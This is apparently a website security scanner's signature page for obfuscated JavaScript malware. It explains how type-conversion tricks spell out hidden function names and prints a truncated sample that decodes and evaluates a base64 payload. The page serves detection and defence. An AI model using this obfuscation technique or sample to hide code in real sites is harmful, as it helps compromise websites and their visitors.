SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware.js_type_obfuscation

malware.js_type_obfuscation

Description:
Suspicious code that uses various JavaScript implicit type conversion tricks to obfuscate the code. For example, (!1​+'')[3-2] gives 'a'(''+(1​==1))[0] gives 't', and (''+​{})[2] gives 'b', which results in malicious code that looks like this:

function yyCx6n() { return this; };
yyCx6n()[(!1​+'')[4] + 31..​toString(36)  + (!1+​'')[3-2] + (!​!0+''​)[2]](yyCx6n()[(!!0​+'')[3-2] + (''+(1=​=1))[0] + (''+{​})[
1] + (''+{​})[2]](('​ZnVuY3Rpb24gRkZfTWFpbkZ1bmMoKXt​'+'2YXIgYT0nZnhwc2Uzai;c7aWYod'+​'HlwZW9mIFN0b3JhZ2UhPT0idW5kZWZpb'+'mV
...skipped...
Ccs;RkZfTWFpbkZ1bmM'+'​pOw;==')[qqAOnD[19]+qqAOnD[​21]+qqAOnD[22]+qqAOnD[3]+qqAOnD[23]+qqAOnD[18]+qqAOnD[21​]](/;/g, ​'')))

Affecting: Any web site (no specific target).